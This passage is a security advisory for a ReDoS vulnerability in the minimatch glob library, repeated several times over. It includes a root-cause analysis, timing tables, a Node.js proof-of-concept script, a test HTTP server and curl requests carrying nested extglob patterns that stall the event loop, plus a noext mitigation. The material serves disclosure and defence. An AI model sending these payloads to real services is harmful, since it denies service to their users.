Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

๐Ÿšจ minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.

Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.

Impact

